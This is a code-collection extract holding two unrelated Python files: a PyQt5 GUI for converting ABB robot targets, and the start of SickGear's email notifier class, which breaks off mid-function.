        brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipText, brush)
        # Inactive colour group: same colours as Active.
        brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
        brush = QtGui.QBrush(QtGui.QColor(255, 182, 65))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
        brush = QtGui.QBrush(QtGui.QColor(0, 0, 207))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Light, brush)
        brush = QtGui.QBrush(QtGui.QColor(0, 0, 172))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Midlight, brush)
        brush = QtGui.QBrush(QtGui.QColor(0, 0, 69))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Dark, brush)
        brush = QtGui.QBrush(QtGui.QColor(0, 0, 92))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Mid, brush)
        brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
        brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.BrightText, brush)
        brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
        brush = QtGui.QBrush(QtGui.QColor(255, 182, 65))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
        brush = QtGui.QBrush(QtGui.QColor(255, 182, 65))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
        brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Shadow, brush)
        brush = QtGui.QBrush(QtGui.QColor(127, 127, 196))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.AlternateBase, brush)
        brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipBase, brush)
        brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipText, brush)
        # Disabled colour group: dimmed (dark blue) text colours.
        brush = QtGui.QBrush(QtGui.QColor(0, 0, 69))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
        brush = QtGui.QBrush(QtGui.QColor(255, 182, 65))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
        brush = QtGui.QBrush(QtGui.QColor(0, 0, 207))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Light, brush)
        brush = QtGui.QBrush(QtGui.QColor(0, 0, 172))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Midlight, brush)
        brush = QtGui.QBrush(QtGui.QColor(0, 0, 69))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Dark, brush)
        brush = QtGui.QBrush(QtGui.QColor(0, 0, 92))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Mid, brush)
        brush = QtGui.QBrush(QtGui.QColor(0, 0, 69))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
        brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.BrightText, brush)
        brush = QtGui.QBrush(QtGui.QColor(0, 0, 69))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
        brush = QtGui.QBrush(QtGui.QColor(255, 182, 65))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
        brush = QtGui.QBrush(QtGui.QColor(255, 182, 65))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
        brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Shadow, brush)
        brush = QtGui.QBrush(QtGui.QColor(0, 0, 138))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.AlternateBase, brush)
        brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipBase, brush)
        brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipText, brush)
        self.frame.setPalette(palette)
        self.frame.setStyleSheet("background-color: rgb(255, 182, 65);")
        self.frame.setFrameShape(QtWidgets.QFrame.StyledPanel)
        self.frame.setFrameShadow(QtWidgets.QFrame.Raised)
        self.frame.setObjectName("frame")
        self.pbRobt2Ast = QtWidgets.QPushButton(self.frame)
        # Hand-added: wire the robtarget -> asterisk conversion handler.
        self.pbRobt2Ast.clicked.connect(self.runConvertRobt2Ast)
        self.pbRobt2Ast.setGeometry(QtCore.QRect(10, 360, 211, 24))
        self.pbRobt2Ast.setStyleSheet("color: rgb(170, 0, 0);\n"
                                      "font: 75 10pt \"MS Shell Dlg 2\";\n"
                                      "background-color: rgb(193, 193, 193);")
        self.pbRobt2Ast.setObjectName("pbRobt2Ast")
        self.pbAst2Robt = QtWidgets.QPushButton(self.frame)
        # Hand-added: wire the asterisk -> robtarget conversion handler.
        self.pbAst2Robt.clicked.connect(self.runConvertAst2Robt)
        self.pbAst2Robt.setGeometry(QtCore.QRect(10, 320, 211, 26))
        self.pbAst2Robt.setStyleSheet("color: rgb(0, 85, 255);\n"
                                      "font: 75 10pt \"MS Shell Dlg 2\";\n"
                                      "background-color: rgb(193, 193, 193);")
        self.pbAst2Robt.setObjectName("pbAst2Robt")
        # Prefix/suffix entry column.
        self.verticalLayoutWidget = QtWidgets.QWidget(self.frame)
        self.verticalLayoutWidget.setGeometry(QtCore.QRect(10, 120, 201, 118))
        self.verticalLayoutWidget.setObjectName("verticalLayoutWidget")
        self.verticalLayout = QtWidgets.QVBoxLayout(self.verticalLayoutWidget)
        self.verticalLayout.setContentsMargins(0, 0, 0, 0)
        self.verticalLayout.setObjectName("verticalLayout")
        self.label = QtWidgets.QLabel(self.verticalLayoutWidget)
        self.label.setMinimumSize(QtCore.QSize(199, 32))
        self.label.setMaximumSize(QtCore.QSize(16777215, 32))
        self.label.setStyleSheet("color: rgb(0, 0, 0);\n"
                                 "font: 75 10pt \"MS Shell Dlg 2\";")
        self.label.setObjectName("label")
        self.verticalLayout.addWidget(self.label)
        self.textPrefix = QtWidgets.QLineEdit(self.verticalLayoutWidget)
        self.textPrefix.setStyleSheet("border-color: rgb(170, 0, 0);\n"
                                      "font: 12pt \"MS Shell Dlg 2\";\n"
                                      "background-color: rgb(255, 255, 255);\n"
                                      "")
        self.textPrefix.setObjectName("textPrefix")
        self.verticalLayout.addWidget(self.textPrefix)
        self.label_2 = QtWidgets.QLabel(self.verticalLayoutWidget)
        self.label_2.setStyleSheet("color: rgb(0, 0, 0);\n"
                                   "font: 75 10pt \"MS Shell Dlg 2\";")
        self.label_2.setObjectName("label_2")
        self.verticalLayout.addWidget(self.label_2)
        self.textSuffix = QtWidgets.QLineEdit(self.verticalLayoutWidget)
        self.textSuffix.setStyleSheet("border-color: rgb(170, 0, 0);\n"
                                      "font: 12pt \"MS Shell Dlg 2\";\n"
                                      "background-color: rgb(255, 255, 255);")
        self.textSuffix.setObjectName("textSuffix")
        self.verticalLayout.addWidget(self.textSuffix)
        # Target-file / output-directory selector rows.
        self.formLayoutWidget = QtWidgets.QWidget(self.frame)
        self.formLayoutWidget.setGeometry(QtCore.QRect(10, 20, 361, 66))
        self.formLayoutWidget.setObjectName("formLayoutWidget")
        self.formLayout = QtWidgets.QFormLayout(self.formLayoutWidget)
        self.formLayout.setContentsMargins(0, 0, 0, 0)
        self.formLayout.setObjectName("formLayout")
        self.pbTarget = QtWidgets.QPushButton(self.formLayoutWidget)
        # Hand-added: open the target-file picker.
        self.pbTarget.clicked.connect(self.handlePbTarget)
        self.pbTarget.setStyleSheet("font: 75 11pt \"MS Shell Dlg 2\";\n"
                                    "background-color: rgb(193, 193, 193);")
        self.pbTarget.setObjectName("pbTarget")
        self.formLayout.setWidget(1, QtWidgets.QFormLayout.LabelRole, self.pbTarget)
        self.pbMod = QtWidgets.QPushButton(self.formLayoutWidget)
        # Hand-added: open the output-directory picker.
        self.pbMod.clicked.connect(self.handlePbMod)
        self.pbMod.setStyleSheet("font: 75 11pt \"MS Shell Dlg 2\";\n"
                                 "background-color: rgb(193, 193, 193);")
        self.pbMod.setObjectName("pbMod")
        self.formLayout.setWidget(2, QtWidgets.QFormLayout.LabelRole, self.pbMod)
        self.lineMod = QtWidgets.QLineEdit(self.formLayoutWidget)
        self.lineMod.setStyleSheet("border-color: rgb(170, 0, 0);\n"
                                   "font: 10pt \"MS Shell Dlg 2\";\n"
                                   "background-color: rgb(255, 255, 255);\n"
                                   "")
        self.lineMod.setReadOnly(True)
        self.lineMod.setObjectName("lineMod")
        self.formLayout.setWidget(2, QtWidgets.QFormLayout.FieldRole, self.lineMod)
        self.lineTarget = QtWidgets.QLineEdit(self.formLayoutWidget)
        self.lineTarget.setStyleSheet("border-color: rgb(170, 0, 0);\n"
                                      "font: 10pt \"MS Shell Dlg 2\";\n"
                                      "background-color: rgb(255, 255, 255);\n"
                                      "")
        self.lineTarget.setReadOnly(True)
        self.lineTarget.setObjectName("lineTarget")
        self.formLayout.setWidget(1, QtWidgets.QFormLayout.FieldRole, self.lineTarget)
        self.pbRobt2Ast.raise_()
        self.pbAst2Robt.raise_()
        self.verticalLayoutWidget.raise_()
        self.formLayoutWidget.raise_()
        # ----- right frame: user motion-instruction list -------------------
        self.frame_2 = QtWidgets.QFrame(self.centralwidget)
        self.frame_2.setGeometry(QtCore.QRect(430, 20, 281, 421))
        self.frame_2.setStyleSheet("background-color: rgb(205, 52, 255);")
        self.frame_2.setFrameShape(QtWidgets.QFrame.StyledPanel)
        self.frame_2.setFrameShadow(QtWidgets.QFrame.Raised)
        self.frame_2.setObjectName("frame_2")
        self.verticalLayoutWidget_2 = QtWidgets.QWidget(self.frame_2)
        self.verticalLayoutWidget_2.setGeometry(QtCore.QRect(10, 20, 258, 231))
        self.verticalLayoutWidget_2.setObjectName("verticalLayoutWidget_2")
        self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.verticalLayoutWidget_2)
        self.verticalLayout_2.setContentsMargins(0, 0, 0, 0)
        self.verticalLayout_2.setObjectName("verticalLayout_2")
        # ===============================================
        self.label_3 = QtWidgets.QLabel(self.verticalLayoutWidget_2)
        self.label_3.setStyleSheet("color: rgb(0, 0, 0);\n"
                                   "font: 75 11pt \"MS Shell Dlg 2\";\n"
                                   "text-decoration: underline;")
        self.label_3.setObjectName("label_3")
        self.verticalLayout_2.addWidget(self.label_3)
        # ===============================================
        self.label_5 = QtWidgets.QLabel(self.verticalLayoutWidget_2)
        self.label_5.setStyleSheet("color: rgb(0, 0, 0);\n"
                                   "font: 75 8pt \"MS Shell Dlg 2\";\n")
        self.label_5.setObjectName("label_5")
        self.verticalLayout_2.addWidget(self.label_5)
        # ===============================================
        self.label_6 = QtWidgets.QLabel(self.verticalLayoutWidget_2)
        self.label_6.setStyleSheet("color: rgb(0, 0, 0);\n"
                                   "font: 75 8pt \"MS Shell Dlg 2\";")
        self.label_6.setObjectName("label_6")
        self.verticalLayout_2.addWidget(self.label_6)
        # ===============================================
        self.listUserMove = QtWidgets.QListWidget(self.verticalLayoutWidget_2)
        # Hand-added: populate the list from the XML instruction store.
        self.filledListUserMove()
        self.listUserMove.setMouseTracking(False)
        self.listUserMove.setStyleSheet("background-color: rgb(205, 52, 255);")
        self.listUserMove.setSelectionMode(QtWidgets.QAbstractItemView.MultiSelection)
        self.listUserMove.setViewMode(QtWidgets.QListView.ListMode)
        self.listUserMove.setObjectName("listUserMove")
        self.verticalLayout_2.addWidget(self.listUserMove)
        # Controls for adding/removing motion instructions.
        self.verticalLayoutWidget_3 = QtWidgets.QWidget(self.frame_2)
        self.verticalLayoutWidget_3.setGeometry(QtCore.QRect(10, 260, 169, 136))
        self.verticalLayoutWidget_3.setObjectName("verticalLayoutWidget_3")
        self.verticalLayout_3 = QtWidgets.QVBoxLayout(self.verticalLayoutWidget_3)
        self.verticalLayout_3.setContentsMargins(0, 0, 0, 0)
        self.verticalLayout_3.setObjectName("verticalLayout_3")
        self.label_4 = QtWidgets.QLabel(self.verticalLayoutWidget_3)
        self.label_4.setStyleSheet("color: rgb(0, 0, 0);\n"
                                   "font: 75 10pt \"MS Shell Dlg 2\";")
        self.label_4.setObjectName("label_4")
        self.verticalLayout_3.addWidget(self.label_4)
        self.lineNewInst = QtWidgets.QLineEdit(self.verticalLayoutWidget_3)
        self.lineNewInst.setStyleSheet("border-color: rgb(170, 0, 0);\n"
                                       "font: 10pt \"MS Shell Dlg 2\";\n"
                                       "background-color: rgb(255, 255, 255);")
        self.lineNewInst.setObjectName("lineNewInst")
        self.verticalLayout_3.addWidget(self.lineNewInst)
        # Motion-type radio buttons; radioButton_1 ("Lineal") is the default.
        self.radioButton_1 = QtWidgets.QRadioButton(self.verticalLayoutWidget_3)
        self.radioButton_1.setChecked(True)
        self.radioButton_1.setObjectName("radioButton_1")
        self.verticalLayout_3.addWidget(self.radioButton_1)
        self.radioButton_2 = QtWidgets.QRadioButton(self.verticalLayoutWidget_3)
        self.radioButton_2.setObjectName("radioButton_2")
        self.verticalLayout_3.addWidget(self.radioButton_2)
        self.radioButton_3 = QtWidgets.QRadioButton(self.verticalLayoutWidget_3)
        self.radioButton_3.setObjectName("radioButton_3")
        self.verticalLayout_3.addWidget(self.radioButton_3)
        self.horizontalLayout_2 = QtWidgets.QHBoxLayout()
        self.horizontalLayout_2.setObjectName("horizontalLayout_2")
        self.pbAddMove = QtWidgets.QPushButton(self.verticalLayoutWidget_3)
        # Hand-added: add the typed instruction to the list and XML store.
        self.pbAddMove.clicked.connect(self.handlePbAddMove)
        self.pbAddMove.setStyleSheet("color: rgb(0, 85, 255);\n"
                                     "font: 75 11pt \"MS Shell Dlg 2\";\n"
                                     "background-color: rgb(193, 193, 193);")
        self.pbAddMove.setObjectName("pbAddMove")
        self.horizontalLayout_2.addWidget(self.pbAddMove)
        self.pbDelMove = QtWidgets.QPushButton(self.verticalLayoutWidget_3)
        # Hand-added: delete the checked instructions from the list and XML store.
        self.pbDelMove.clicked.connect(self.handlePbDelMove)
        self.pbDelMove.setStyleSheet("color: rgb(170, 0, 0);\n"
                                     "font: 75 11pt \"MS Shell Dlg 2\";\n"
                                     "background-color: rgb(193, 193, 193);")
        self.pbDelMove.setObjectName("pbDelMove")
        self.horizontalLayout_2.addWidget(self.pbDelMove)
        self.verticalLayout_3.addLayout(self.horizontalLayout_2)
        self.verticalLayoutWidget_2.raise_()
        self.verticalLayoutWidget_3.raise_()
        self.label_4.raise_()
        self.frame.raise_()
        self.frame_2.raise_()
        MainWindow.setCentralWidget(self.centralwidget)
        self.menubar = QtWidgets.QMenuBar(MainWindow)
        self.menubar.setGeometry(QtCore.QRect(0, 0, 730, 21))
        self.menubar.setObjectName("menubar")
        MainWindow.setMenuBar(self.menubar)
        self.statusbar = QtWidgets.QStatusBar(MainWindow)
        self.statusbar.setObjectName("statusbar")
        MainWindow.setStatusBar(self.statusbar)
        self.actionUser_motion_instructions = QtWidgets.QAction(MainWindow)
        self.actionUser_motion_instructions.setObjectName("actionUser_motion_instructions")
        # Apply translatable texts, then auto-connect on_<object>_<signal> slots.
        self.retranslateUi(MainWindow)
        QtCore.QMetaObject.connectSlotsByName(MainWindow)
    def retranslateUi (self, MainWindow):
        """
        Set every user-visible text through Qt's translation layer.

        Auto-generated by pyuic5; called once at the end of setupUi().
        """
        _translate = QtCore.QCoreApplication.translate
        MainWindow.setWindowTitle(_translate("MainWindow", "ABB RapidTools_v2017.01 [by X.Fernandez]"))
        self.pbRobt2Ast.setText(_translate("MainWindow", "Convert from Robtarget to *"))
        self.pbAst2Robt.setText(_translate("MainWindow", "Convert from * to Robtarget"))
        self.label.setText(_translate("MainWindow", "Prefix"))
        self.label_2.setText(_translate("MainWindow", "Suffix"))
        self.pbTarget.setText(_translate("MainWindow", "Select target file"))
        self.pbMod.setText(_translate("MainWindow", "Save modified file to:"))
        self.label_3.setText(_translate("MainWindow", "User Motion Instructions"))
        self.label_5.setText(_translate("MainWindow", "* tick the box of the instruction you \nwould like to exclude from the conversion"))
        self.label_6.setText(_translate("MainWindow", "** tick the box of the instruction you \nwould like to delete and click 'Delete' button"))
        self.label_4.setText(_translate("MainWindow", "New motion instruction"))
        self.radioButton_1.setText(_translate("MainWindow", "Lineal"))
        self.radioButton_2.setText(_translate("MainWindow", "Joint"))
        self.radioButton_3.setText(_translate("MainWindow", "Circular"))
        self.pbAddMove.setText(_translate("MainWindow", "Add"))
        self.pbDelMove.setText(_translate("MainWindow", "Delete"))
        self.actionUser_motion_instructions.setText(_translate("MainWindow", "User motion instructions"))
def handlePbTarget (self):
"""
Method that handles the click action of the 'Select target file' button.
Opens a dialog in order to select the target file.
"""
filename = QtWidgets.QFileDialog.getOpenFileName(MainWindow, "Open file", "C://",
"ABB Files (*.mod)")
if filename:
self.lineTarget.setText(filename[0])
def handlePbMod (self):
"""
Method that handles the click action of the 'Save Modified file to' button.
Opens a dialog in order to select the dir where the modified file will be store.
"""
directory = QtWidgets.QFileDialog.getExistingDirectory(MainWindow, "Open a folder", "C:/",
QtWidgets.QFileDialog.ShowDirsOnly)
if directory:
self.lineMod.setText(directory)
def handlePbAddMove (self):
"""
Method that handles the click action of the 'Add' button.
Add instruction given in textfield of the user interface.
"""
msgBox =MyMessages.MyMsg()
strInst = self.lineNewInst.text()
strType = ''
if self.radioButton_1.isChecked():
strType = 'Lineal'
if self.radioButton_2.isChecked():
strType = 'Joint'
if self.radioButton_3.isChecked():
strType = 'Circular'
if strType and strInst and not xml_file.findDuplicates(strInst):
xml_file.appendMovement(strInst, strType)
item = QtWidgets.QListWidgetItem(self.listUserMove)
ch = QtWidgets.QCheckBox()
ch.setText(strInst)
self.listUserMove.setItemWidget(item, ch)
self.lineNewInst.setText('')
self.listUserMove.repaint()
elif xml_file.findDuplicates(strInst):
msgBox.msgBoxInfo("Instruction already exist", None, "Adding instruction")
else:
msgBox.msgBoxInfo("Instruction empty", None, "Adding instruction")
def handlePbDelMove (self):
"""
Method that handles the click action of the 'Delete' button.
Deletes instruction checked in the user interface list.
"""
removeList = list()
for index in range(self.listUserMove.count()):
check_box = self.listUserMove.itemWidget(self.listUserMove.item(index))
state = check_box.checkState()
if state == 2:
removeList.append(check_box.text())
for strRemove in removeList:
xml_file.removeMovement(strRemove)
self.listUserMove.clear()
self.filledListUserMove()
self.listUserMove.repaint()
def filledListUserMove (self):
"""
Method that fills the list of keyword or instruction
in the user interface.
"""
for aItem in xml_file.getMovements():
item = QtWidgets.QListWidgetItem(self.listUserMove)
ch = QtWidgets.QCheckBox()
ch.setText(aItem)
self.listUserMove.setItemWidget(item, ch)
def getCheckedItems (self):
"""
Method that returns a list of the keyword or instruction
checked in the user interface.
"""
chekedList = list()
for index in range(self.listUserMove.count()):
check_box = self.listUserMove.itemWidget(self.listUserMove.item(index))
state = check_box.checkState()
if state == 2:
chekedList.append(check_box.text())
return chekedList
def getKeywordList (self):
"""
Method that returns a list of the keyword or instruction
in the user interface.
"""
listItems = list()
for index in range(self.listUserMove.count()):
check_box = self.listUserMove.itemWidget(self.listUserMove.item(index))
listItems.append(check_box.text())
return listItems
def runConvertAst2Robt (self):
"""
Method that runs * to robtarget conversion.
Method call when pbAst2Robt button clicked
"""
msgBox = MyMessages.MyMsg()
try:
keywordList = self.getKeywordList()
excludedList = self.getCheckedItems()
strTarget = self.lineTarget.text()
strMod = self.lineMod.text()
strPrefix = self.textPrefix.text()
strSuffix = self.textSuffix.text()
# ===================================
if not strTarget:
raise MyMessages.MyError(1)
if not strMod:
raise MyMessages.MyError(2)
if not strPrefix:
raise MyMessages.MyError(3)
# ====================================================================================================
targetFileObject = TargetFile.TargetFile(strTarget, keywordList, excludedList, strPrefix, strSuffix)
targetFileObject.processAst2RobtTargetFile()
# ====================================================================================================
modFileObject = ModFile.ModFile(strMod, targetFileObject.getFileArray(),
targetFileObject.getSubFileArray(), strPrefix, strSuffix)
modFileObject.processAst2RobtModFile()
# ====================================================================================================
msgBox.msgBoxInfo("Asterisk to robtarget converted", "Process finish", "Convert asterisk2robtarget")
# ====================================================================================================
except FileNotFoundError:
msgBox.msgBoxWarning("WARNING!, Target file or dir missing. ", "Error", "Convert asterisk2robtarget")
except PermissionError:
msgBox.msgBoxWarning("WARNING!, Target file or dir missing. ", "Error", "Convert asterisk2robtarget")
except MyMessages.MyError as e:
exceptValue = e.value
if exceptValue == 1:
msgBox.msgBoxWarning("WARNING!, Setting the target-file path required. ",
"Error", "Convert asterisk2robtarget")
elif exceptValue == 2:
msgBox.msgBoxWarning("WARNING!, Setting the modified-file dir path required. ",
"Error", "Convert asterisk2robtarget")
elif exceptValue == 3:
msgBox.msgBoxWarning("WARNING!, Setting the prefix-field required. ",
"Error", "Convert asterisk2robtarget")
def runConvertRobt2Ast (self):
"""
Method that runs robtarget to * conversion.
Method call when pbRobt2Ast button clicked
"""
msgBox = MyMessages.MyMsg()
try:
keywordList = self.getKeywordList()
excludedList = self.getCheckedItems()
strTarget = self.lineTarget.text()
strMod = self.lineMod.text()
# ===================================
if not strTarget:
raise MyMessages.MyError(1)
if not strMod:
raise MyMessages.MyError(2)
# ====================================================================================================
targetFileObject = TargetFile.TargetFile(strTarget, keywordList, excludedList)
targetFileObject.processRobt2AstTargetFile()
# ====================================================================================================
modFileObject = ModFile.ModFile(strMod, targetFileObject.getFileArray(),
targetFileObject.getSubFileArray())
modFileObject.processRobt2AstModFile()
# ====================================================================================================
msgBox.msgBoxInfo("Robtarget to asterisk converted", "Process finish", "Convert robtarget2asterisk")
# ====================================================================================================
except FileNotFoundError:
msgBox.msgBoxWarning("WARNING!, Target file or dir missing. ", "Error", "Convert robtarget2asterisk")
except PermissionError:
msgBox.msgBoxWarning("WARNING!, Target file or dir missing. ", "Error", "Convert robtarget2asterisk")
except MyMessages.MyError as e:
exceptValue = e.value
if exceptValue == 1:
msgBox.msgBoxWarning("WARNING!, Setting the target-file path required. ",
"Error", "Convert robtarget2asterisk")
elif exceptValue == 2:
msgBox.msgBoxWarning("WARNING!, Setting the modified-file dir path required. ",
"Error", "Convert robtarget2asterisk")
if __name__ == "__main__":
    import sys
    # Create the Qt application and the top-level window, bind the generated
    # UI to it and enter the Qt event loop.  NOTE: the module-level name
    # ``MainWindow`` created here is also used as the dialog parent by the
    # handlePbTarget/handlePbMod methods, so it must keep this exact name.
    app = QtWidgets.QApplication(sys.argv)
    MainWindow = QtWidgets.QMainWindow()
    ui = Ui_MainWindow()
    ui.setupUi(MainWindow)
    MainWindow.show()
    sys.exit(app.exec_())
|
XabierFernandez/Scripts-For-Robots
|
ABB/Robtargets_Converter/GUI/ABB_RapidTools.py
|
Python
|
gpl-3.0
| 32,147
|
# Authors:
# Derek Battams <derek@battams.ca>
# Pedro Jose Pereira Vieito (@pvieito) <pvieito@gmail.com>
#
# URL: https://github.com/sickgear/sickgear
#
# This file is part of SickGear.
#
# SickGear is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# SickGear is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with SickGear. If not, see <http://www.gnu.org/licenses/>.
import re
import sickbeard
import smtplib
from sickbeard import db
from sickbeard import logger
from sickbeard.common import notifyStrings, NOTIFY_SNATCH, NOTIFY_DOWNLOAD, NOTIFY_SUBTITLE_DOWNLOAD
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.utils import formatdate
class EmailNotifier:
    def __init__(self):
        # Human-readable description of the most recent send failure; set in
        # _sendmail and read by _send_email when logging errors.
        self.last_err = None
def test_notify(self, host, port, smtp_from, use_tls, user, pwd, to):
msg = MIMEText('Success. This is a SickGear test message. Typically sent on, %s' %
notifyStrings[NOTIFY_DOWNLOAD])
msg['Subject'] = 'SickGear: Test message'
msg['From'] = smtp_from
msg['To'] = to
msg['Date'] = formatdate(localtime=True)
return self._sendmail(host, port, smtp_from, use_tls, user, pwd, [to], msg, True)
def _send_email(self, title, ep_name, lang='', extra='', force=False):
if not sickbeard.USE_EMAIL and not force:
return
show = ep_name.split(' - ')[0]
to = self._get_recipients(show)
if not any(to):
logger.log(u'No email recipients to notify, skipping', logger.WARNING)
return
logger.log(u'Email recipients to notify: %s' % to, logger.DEBUG)
try:
msg = MIMEMultipart('alternative')
msg.attach(MIMEText(
'<body style="font-family:Helvetica, Arial, sans-serif;">' +
'<h3>SickGear Notification - %s</h3>\n' % title +
'<p>Show: <b>' + show.encode('ascii', 'xmlcharrefreplace') +
'</b></p>\n<p>Episode: <b>' +
unicode(re.search('.+ - (.+?-.+) -.+', ep_name).group(1)).encode('ascii', 'xmlcharrefreplace') +
extra +
'</b></p>\n\n' +
'<footer style="margin-top:2.5em;padding:.7em 0;color:#777;border-top:#BBB solid 1px;">' +
'Powered by SickGear.</footer></body>',
'html'))
except:
try:
msg = MIMEText(ep_name)
except:
msg = MIMEText('Episode %s' % title)
msg['Subject'] = '%s%s: %s' % (lang, title, ep_name)
msg['From'] = sickbeard.EMAIL_FROM
msg['To'] = ','.join(to)
msg['Date'] = formatdate(localtime=True)
if self._sendmail(sickbeard.EMAIL_HOST, sickbeard.EMAIL_PORT, sickbeard.EMAIL_FROM, sickbeard.EMAIL_TLS,
sickbeard.EMAIL_USER, sickbeard.EMAIL_PASSWORD, to, msg):
logger.log(u'%s notification sent to [%s] for "%s"' % (title, to, ep_name), logger.DEBUG)
else:
logger.log(u'%s notification ERROR: %s' % (title, self.last_err), logger.ERROR)
def notify_snatch(self, ep_name, title=notifyStrings[NOTIFY_SNATCH]):
"""
Send a notification that an episode was snatched
:param ep_name: The name of the episode that was snatched
:param title: The title of the notification (optional)
"""
if sickbeard.EMAIL_NOTIFY_ONSNATCH:
title = sickbeard.EMAIL_OLD_SUBJECTS and 'Snatched' or title
self._send_email(title, ep_name)
def notify_download(self, ep_name, title=notifyStrings[NOTIFY_DOWNLOAD]):
"""
Send a notification that an episode was downloaded
:param ep_name: The name of the episode that was downloaded
:param title: The title of the notification (optional)
"""
if sickbeard.EMAIL_NOTIFY_ONDOWNLOAD:
title = sickbeard.EMAIL_OLD_SUBJECTS and 'Downloaded' or title
self._send_email(title, ep_name)
def notify_subtitle_download(self, ep_name, lang, title=notifyStrings[NOTIFY_SUBTITLE_DOWNLOAD]):
"""
Send a notification that a subtitle was downloaded
:param ep_name: The name of the episode that was downloaded
:param lang: Subtitle language
:param title: The title of the notification (optional)
"""
if sickbeard.EMAIL_NOTIFY_ONSUBTITLEDOWNLOAD:
title = sickbeard.EMAIL_OLD_SUBJECTS and 'Subtitle Downloaded' or title
self._send_email(title, ep_name, '%s ' % lang, '</b></p>\n<p>Language: <b>%s' % lang)
    def notify_git_update(self, new_version='??'):
        # Intentionally a no-op: e-mail is not used for update notices; the
        # method only exists so this notifier matches the common notifier
        # interface -- TODO confirm against the other notifier classes.
        pass
@staticmethod
def _get_recipients(show_name=None):
email_list = []
# Grab the global recipients
if sickbeard.EMAIL_LIST:
for email_address in sickbeard.EMAIL_LIST.split(','):
if any(email_address.strip()):
email_list.append(email_address)
# Grab the recipients for the show
if None is not show_name:
my_db = db.DBConnection()
for result in my_db.select('SELECT notify_list FROM tv_shows WHERE show_name = ?', (show_name,)):
if result['notify_list']:
for email_address in result['notify_list'].split(','):
if any(email_address.strip()):
